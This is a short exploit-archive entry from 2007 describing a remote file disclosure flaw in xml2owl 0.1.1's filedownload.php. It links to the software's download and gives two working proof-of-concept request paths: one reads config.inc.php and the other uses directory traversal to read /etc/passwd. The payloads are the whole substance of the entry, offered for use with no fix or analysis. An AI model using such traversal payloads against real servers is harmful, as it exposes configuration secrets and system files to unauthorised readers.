xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability
# Published : 2007-12-13
# Author : GoLd_M
# Previous Title : MMS Gallery PHP 1.0 (id) Remote File Disclosure Vulnerability
# Next Title : Hosting Controller 6.1 Hot fix <= 3.3 Multiple Remote Vulnerabilities

xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability
D.s : http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2
POC :
     /xml2owl-0.1.1/filedownload.php?file=config.inc.php
     /xml2owl-0.1.1/filedownload.php?file=../../../../../../../etc/passwd

# www.Syue.com [2007-12-13]